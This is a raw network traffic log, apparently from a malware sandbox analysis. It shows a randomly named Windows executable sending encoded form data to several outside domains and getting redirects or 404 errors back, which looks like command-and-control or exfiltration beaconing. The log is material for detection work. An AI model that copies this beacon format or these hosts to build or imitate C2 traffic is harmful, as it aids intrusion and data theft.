                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=HkaQ9ze9SIOfatgYmPCJStmmGrwuHZro78BvxuFBladxGl5f5qVpHtRLYGps15bp7onNsQ0s3fKqSRi1ddpDc+06uHwM9FyHaPGcnghZPoSSUljl5Y12XiVD9XxWOMSSBvMbHE2Yo8Iw+K8q/4OYWNJ6UuuwwCIyf3tjWSJRvEIo0PtiG3v/cpQHFMqrWFPuF1Qe1zfJIugtz7qDRCrBn1py7EZJmzug2Q==
                                                                Sep 22, 2024 17:43:39.238420963 CEST | 810 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Sun, 22 Sep 2024 15:43:39 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Sun, 22 Sep 2024 16:43:39 GMT
                                                                Location: https://www.rtpngk.xyz/876i/
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c7W37wddJ2srWjBP%2BRnEiCmh8n4fuzDsAsYfokx%2FqExuY38YhhLm3m98o4M2flzpQbvFTF7UuWin92CHI2mG4VNfe46cZkU55QW3MfZRAaGY4iQsdAxNxAGXm54DUm3Org%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8c73696cc8cfc411-EWR
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                43 | 192.168.2.6 | 49768 | 188.114.96.3 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:43:41.514853954 CEST | 1714 | OUT | POST /876i/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.rtpngk.xyz
                                                                Origin: http://www.rtpngk.xyz
                                                                Referer: http://www.rtpngk.xyz/876i/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 48 6b 61 51 39 7a 65 39 53 49 4f 66 61 74 67 59 6d 50 43 4a 53 74 6d 6d 47 72 77 75 48 5a 72 6f 37 38 42 76 78 75 46 42 6c 61 46 78 47 7a 74 66 6f 37 56 70 56 39 52 4c 51 6d 70 74 31 35 62 6f 37 6f 50 4a 73 51 77 38 33 61 47 71 64 54 61 31 59 6f 64 44 53 2b 30 36 67 58 77 42 35 46 7a 48 61 50 57 59 6e 68 64 5a 50 6f 53 53 55 69 54 6c 2f 4e 56 32 52 69 56 45 36 58 78 4b 59 38 54 63 42 76 56 67 48 46 44 6a 6f 50 77 77 2b 71 73 71 36 4e 69 59 62 4e 4a 34 5a 4f 76 33 77 43 30 39 66 33 78 52 57 53 4e 2f 76 48 55 6f 32 37 77 30 61 6e 2f 59 4c 5a 77 42 57 50 54 41 52 6a 53 65 4b 55 38 6a 34 41 75 68 4c 4d 51 2b 30 39 61 2b 5a 79 54 47 77 57 74 69 37 7a 4d 67 6b 79 58 61 67 58 37 65 6c 43 68 64 4d 77 75 32 53 37 31 48 59 6e 68 73 67 73 4a 39 38 4c 41 7a 4c 50 4b 45 31 46 31 72 46 33 68 57 6b 49 52 74 6d 41 61 61 7a 30 43 37 64 38 77 32 35 48 6e 43 43 62 6d 6b 34 54 53 4f 67 4e 54 51 52 4e 7a 52 61 76 62 6d 46 6a 68 45 73 53 66 6e 4a 31 35 35 6d 36 6b 61 32 55 61 62 45 54 4b 67 61 69 64 [TRUNCATED]
                                                                 Data Ascii: i4fTbV=[TRUNCATED]
                                                                 Sep 22, 2024 17:43:41.978915930 CEST | 840 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Sun, 22 Sep 2024 15:43:41 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Sun, 22 Sep 2024 16:43:41 GMT
                                                                Location: https://www.rtpngk.xyz/876i/
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VZSRwewCaF1Y0n9uCxa7WXjLmBxSZ%2BUJm4xKHM4JHOGDgMDcePIUo9WFl8yYfixcIsST3L4Nk0TKXxiGJXGNLOw3LJ1q2vDPEV1aSLSY%2B9MO5xAbxJUEo0V3Lwwj858WaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8c73697f0dde423e-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 44 | 192.168.2.6 | 49769 | 188.114.96.3 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Sep 22, 2024 17:43:44.095858097 CEST | 418 | OUT | GET /876i/?i4fTbV=Kmyw+GmuH5iWde8Ln9Oic9mBBukDH7X+neEL39Fbw9B5TSRbsYx5ep9OaSlRgrfJ9t7osQY2p6mHYTWDA9JvWsELiS8f9ArZa8bqi05RWv7nbhrshbpVBxpFhG8DfoS8KPtDMCA=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.rtpngk.xyz
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                 Sep 22, 2024 17:43:44.513479948 CEST | 985 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Sun, 22 Sep 2024 15:43:44 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Sun, 22 Sep 2024 16:43:44 GMT
                                                                Location: https://www.rtpngk.xyz/876i/?i4fTbV=Kmyw+GmuH5iWde8Ln9Oic9mBBukDH7X+neEL39Fbw9B5TSRbsYx5ep9OaSlRgrfJ9t7osQY2p6mHYTWDA9JvWsELiS8f9ArZa8bqi05RWv7nbhrshbpVBxpFhG8DfoS8KPtDMCA=&azq=fdKL
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pADVP2hzkKnGhaUzkWUBw2QYdjfD3ylmuttL%2BbTtsTBTozUGOJn8fzqMOwZhuIULiGYdFdDXqDlDYGnnhv4E0UOeUanW%2Fq0KyDJFaa34yri8wNBRr%2FhQ61fsSPkwyhmQ7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                Server: cloudflare
                                                                CF-RAY: 8c73698ede9b8c27-EWR
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 45 | 192.168.2.6 | 49770 | 154.23.184.240 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Sep 22, 2024 17:43:49.794701099 CEST | 674 | OUT | POST /i557/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.wcq24.top
                                                                Origin: http://www.wcq24.top
                                                                Referer: http://www.wcq24.top/i557/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6d 37 5a 7a 41 6a 69 67 62 64 64 47 57 50 71 30 56 67 4d 70 35 73 32 56 4f 39 73 51 58 6c 35 4a 46 66 4d 4e 34 57 68 6c 4b 4d 33 38 31 4a 6a 55 31 65 6f 41 62 4e 30 45 71 6a 6f 62 54 4f 47 57 48 49 35 42 44 57 53 61 38 78 62 75 51 48 6f 4a 70 72 34 35 77 6a 71 66 79 65 47 38 4d 6f 4b 55 53 41 58 62 41 4e 53 48 6d 34 61 65 6d 6e 46 4d 34 43 71 50 53 34 68 51 56 51 44 67 76 64 4a 54 6a 47 59 70 34 5a 71 44 6a 69 6a 42 53 78 4b 38 2f 51 70 4c 44 4b 77 58 48 33 4c 4e 74 4f 35 32 34 31 48 6d 58 46 50 43 67 75 6f 55 4a 55 6d 4e 31 7a 73 34 52 4a 4e 49 77 53 41 69 50 32 68 6d 66 4b 61 4b 78 31 70 41 36 54 51 42
                                                                Data Ascii: i4fTbV=m7ZzAjigbddGWPq0VgMp5s2VO9sQXl5JFfMN4WhlKM381JjU1eoAbN0EqjobTOGWHI5BDWSa8xbuQHoJpr45wjqfyeG8MoKUSAXbANSHm4aemnFM4CqPS4hQVQDgvdJTjGYp4ZqDjijBSxK8/QpLDKwXH3LNtO5241HmXFPCguoUJUmN1zs4RJNIwSAiP2hmfKaKx1pA6TQB
                                                                 Sep 22, 2024 17:43:50.671076059 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:50 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a7679f-94"
                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 46 | 192.168.2.6 | 49771 | 154.23.184.240 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Sep 22, 2024 17:43:52.333945036 CEST | 698 | OUT | POST /i557/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.wcq24.top
                                                                Origin: http://www.wcq24.top
                                                                Referer: http://www.wcq24.top/i557/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6d 37 5a 7a 41 6a 69 67 62 64 64 47 45 65 36 30 57 43 6b 70 6f 4d 32 57 43 64 73 51 4e 56 35 56 46 66 51 4e 34 58 30 67 4b 2f 54 38 30 6f 54 55 30 61 38 41 59 4e 30 45 69 44 6f 61 4e 2b 47 6e 48 49 38 68 44 54 79 61 38 78 50 75 51 47 59 4a 70 34 51 36 77 7a 71 5a 39 2b 47 2b 49 6f 4b 55 53 41 58 62 41 4e 75 74 6d 34 53 65 6d 58 31 4d 2f 51 43 4d 61 59 68 54 44 41 44 67 6c 39 4a 58 6a 47 59 66 34 59 32 74 6a 67 72 42 53 7a 69 38 2b 45 46 49 57 61 78 65 61 6e 4b 45 6c 4c 59 2f 2b 54 43 30 5a 45 37 37 31 63 70 2b 42 43 6e 58 70 41 73 62 44 5a 74 4b 77 51 59 51 50 57 68 4d 64 4b 69 4b 6a 69 6c 6e 31 6e 31 69 64 32 43 79 58 6f 70 62 67 6e 33 7a 31 6e 51 37 36 2f 51 64 63 41 3d 3d
                                                                Data Ascii: i4fTbV=m7ZzAjigbddGEe60WCkpoM2WCdsQNV5VFfQN4X0gK/T80oTU0a8AYN0EiDoaN+GnHI8hDTya8xPuQGYJp4Q6wzqZ9+G+IoKUSAXbANutm4SemX1M/QCMaYhTDADgl9JXjGYf4Y2tjgrBSzi8+EFIWaxeanKElLY/+TC0ZE771cp+BCnXpAsbDZtKwQYQPWhMdKiKjiln1n1id2CyXopbgn3z1nQ76/QdcA==
                                                                 Sep 22, 2024 17:43:53.212805986 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:53 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a7679f-94"
                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 47 | 192.168.2.6 | 49772 | 154.23.184.240 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Sep 22, 2024 17:43:54.886008024 CEST | 1711 | OUT | POST /i557/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.wcq24.top
                                                                Origin: http://www.wcq24.top
                                                                Referer: http://www.wcq24.top/i557/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6d 37 5a 7a 41 6a 69 67 62 64 64 47 45 65 36 30 57 43 6b 70 6f 4d 32 57 43 64 73 51 4e 56 35 56 46 66 51 4e 34 58 30 67 4b 2f 62 38 30 61 72 55 31 39 41 41 5a 4e 30 45 73 6a 6f 66 4e 2b 47 36 48 49 45 74 44 54 2f 6c 38 79 33 75 51 67 6b 4a 2b 5a 51 36 37 7a 71 5a 32 65 47 2f 4d 6f 4b 37 53 41 6d 51 41 4e 65 74 6d 34 53 65 6d 52 5a 4d 70 53 71 4d 63 59 68 51 56 51 44 6b 76 64 49 43 6a 47 41 68 34 5a 43 54 67 51 4c 42 53 54 79 38 34 78 70 49 4c 71 78 63 5a 6e 4b 63 6c 4c 63 38 2b 54 32 77 5a 45 50 52 31 63 74 2b 52 55 33 4c 74 42 64 4d 51 2f 6c 41 76 41 6c 72 57 67 70 63 61 63 79 70 74 41 70 36 38 45 68 61 52 51 65 70 65 49 6b 2b 69 46 44 4a 39 77 56 6f 79 4e 56 45 44 7a 55 4d 78 6b 66 56 72 53 68 30 46 4c 36 42 49 4a 6b 2b 4a 7a 50 37 4d 36 55 67 42 6a 6b 56 35 4f 4f 76 53 6a 4b 78 63 56 48 5a 58 32 52 4e 2f 46 49 6f 67 77 43 57 4e 31 6d 79 64 66 6b 44 45 47 6b 48 76 57 65 55 38 4e 59 6e 79 4b 38 35 46 47 4a 49 69 6c 78 67 42 6e 33 31 57 74 31 51 53 77 2f 4a 30 70 7a 55 31 6a 52 [TRUNCATED]
                                                                 Data Ascii: i4fTbV=[TRUNCATED]
                                                                 Sep 22, 2024 17:43:55.768338919 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:55 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a7679f-94"
                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 48 | 192.168.2.6 | 49773 | 154.23.184.240 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Sep 22, 2024 17:43:57.424365997 CEST | 417 | OUT | GET /i557/?azq=fdKL&i4fTbV=r5xTDTq+P/dmGc23aTYP++6vD4IIXl1qT9Awk095V47k3JGT99IqetoKvxAOeL2EPogdFWvWqA7DbFw7qeor8ymW97eZJYTdZjDdM43a/Prut01z/AyWNItbEAzthb57mHY0hv0= HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.wcq24.top
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                 Sep 22, 2024 17:43:58.384762049 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:58 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a7679f-94"
                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 49 | 192.168.2.6 | 49774 | 188.114.97.3 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Sep 22, 2024 17:44:03.450546026 CEST | 674 | OUT | POST /4hfb/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.cc101.pro
                                                                Origin: http://www.cc101.pro
                                                                Referer: http://www.cc101.pro/4hfb/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6b 32 33 43 4d 77 4c 63 70 6b 73 33 7a 6f 78 76 62 43 30 6b 51 48 65 34 43 68 31 50 66 36 54 69 78 2f 61 45 4f 57 32 73 4d 2b 49 47 70 4c 43 64 50 37 72 42 63 46 7a 38 6d 66 44 6b 32 70 6c 61 52 4c 4c 4e 30 7a 79 70 37 62 2f 58 61 6f 6b 56 38 54 38 56 74 39 49 54 73 4c 69 2b 64 7a 64 34 51 74 6e 30 79 5a 35 4e 75 55 58 71 50 38 49 41 44 4f 31 51 41 77 4a 4e 30 41 6b 51 51 72 4f 75 6b 49 57 38 4a 53 67 41 54 2b 49 41 6a 76 77 6f 41 36 6d 37 49 55 64 4b 57 72 54 62 55 56 6f 67 4e 6a 61 47 63 31 4c 36 76 6f 50 78 72 68 6f 35 5a 69 4a 69 53 31 41 63 4f 79 57 53 6c 30 31 5a 56 50 70 37 54 33 69 4d 43 79 66 67
                                                                Data Ascii: i4fTbV=k23CMwLcpks3zoxvbC0kQHe4Ch1Pf6Tix/aEOW2sM+IGpLCdP7rBcFz8mfDk2plaRLLN0zyp7b/XaokV8T8Vt9ITsLi+dzd4Qtn0yZ5NuUXqP8IADO1QAwJN0AkQQrOukIW8JSgAT+IAjvwoA6m7IUdKWrTbUVogNjaGc1L6voPxrho5ZiJiS1AcOyWSl01ZVPp7T3iMCyfg


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 50 | 192.168.2.6 | 49775 | 188.114.97.3 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Sep 22, 2024 17:44:05.990099907 CEST | 698 | OUT | POST /4hfb/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.cc101.pro
                                                                Origin: http://www.cc101.pro
                                                                Referer: http://www.cc101.pro/4hfb/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6b 32 33 43 4d 77 4c 63 70 6b 73 33 79 49 74 76 64 6c 59 6b 59 48 65 37 65 52 31 50 56 61 54 6d 78 2f 57 45 4f 58 7a 33 4d 4e 38 47 6f 71 79 64 4d 2f 2f 42 62 46 7a 38 2f 76 44 68 70 35 6c 42 52 4c 50 46 30 78 32 70 37 62 72 58 61 71 38 56 2f 6b 51 57 72 74 49 56 31 62 69 77 43 6a 64 34 51 74 6e 30 79 59 4a 33 75 53 2f 71 50 4d 59 41 41 72 42 54 42 77 4a 53 33 41 6b 51 62 4c 4f 79 6b 49 57 53 4a 54 38 36 54 38 77 41 6a 75 41 6f 42 72 6d 34 43 55 64 49 4c 62 53 6f 48 51 46 6b 50 53 58 45 65 48 44 37 2b 4c 44 71 71 58 70 6a 46 52 4a 42 41 6c 67 65 4f 77 4f 67 6c 55 31 7a 58 50 52 37 42 67 75 72 4e 47 36 44 46 35 65 6b 78 77 6b 68 5a 4f 70 36 68 6f 2b 6d 63 41 39 30 76 77 3d 3d
                                                                Data Ascii: i4fTbV=k23CMwLcpks3yItvdlYkYHe7eR1PVaTmx/WEOXz3MN8GoqydM//BbFz8/vDhp5lBRLPF0x2p7brXaq8V/kQWrtIV1biwCjd4Qtn0yYJ3uS/qPMYAArBTBwJS3AkQbLOykIWSJT86T8wAjuAoBrm4CUdILbSoHQFkPSXEeHD7+LDqqXpjFRJBAlgeOwOglU1zXPR7BgurNG6DF5ekxwkhZOp6ho+mcA90vw==


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 51 | 192.168.2.6 | 49776 | 188.114.97.3 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Sep 22, 2024 17:44:08.535540104 CEST | 1711 | OUT | POST /4hfb/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.cc101.pro
                                                                Origin: http://www.cc101.pro
                                                                Referer: http://www.cc101.pro/4hfb/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
